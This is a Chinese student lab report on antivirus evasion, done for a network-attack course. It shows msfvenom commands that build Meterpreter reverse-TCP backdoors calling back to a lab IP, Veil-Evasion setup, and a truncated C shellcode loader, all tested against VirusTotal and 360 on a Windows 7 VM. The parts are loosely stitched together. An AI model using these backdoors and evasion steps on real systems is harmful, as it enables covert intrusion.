一、免杀原理
二、基础问题回答
三、免杀效果评价
利用VirusTotal或Virscan,可以上传免杀处理过的程序进行检测。
在实验二中使用msf生成了后门程序,使用VirusTotal或Virscan这两个网站对生成的后门程序进行扫描。
用VirusTotal扫描后结果如下:
下面我们用msf编码器对后门程序进行一次到多次的编码,并进行检测
-e
选择编码器,-b
是payload中需要去除的字符,该命令中为了使‘\x00‘不出现在shellcode中msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.155 LPORT=5311 x> ljx_backdoor_java.jar
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.155 LPORT=5311 x> ljx_backdoor.php
安装veil
mkdir -p ~/.cache/wine cd ~/.cache/wine wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi
y
继续安装直至完成:设置反弹连接IP,命令为:set LHOST 192.168.1.155,注意此处的IP是KaliIP;
设置端口,命令为:set LPORT 5311
如上图所示,保存路径为/var/lib/veil/output/compiled/veil_c_5311.exe
检测一下:
unsigned char buf[] = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" 此处省略 "\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"; int main() { int (*func)() = (int(*)())buf; func(); }
实验环境:对方电脑为 win7虚拟机,360安全卫士11.4.0.2003(由于我的kali问题,最后一个任务我与5329何佳伟用了同一个win7系统进行反弹连接)
由于病毒库的更新速度非常的快,我们只有掌握更加成熟的技术来包装病毒才能不被查杀到。
对于实战来说,我还需要学习更多对病毒的改造方法。
在安装veil evasion的时候展开包一直失败,后来上网百度了以后才知道这个和版本有关系
输入以下代码之后问题就顺利解决了
mkdir -p ~/.cache/wine cd ~/.cache/wine wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi
首先那个veil太难装了总出错,一开始装了一个晚上最后还是失败了,这次实验学到了很多知识。
最重要也是最有趣的就是如何把后门软件进行改造来让它伪装骗过所有的杀毒软件,而且实验中
也让我们也见识到了中国杀毒软件的“菜”,学习永无止境!
2018-2019-2 网络对抗技术 20165311 Exp3 免杀原理与实践
原文:https://www.cnblogs.com/fakerli/p/10619182.html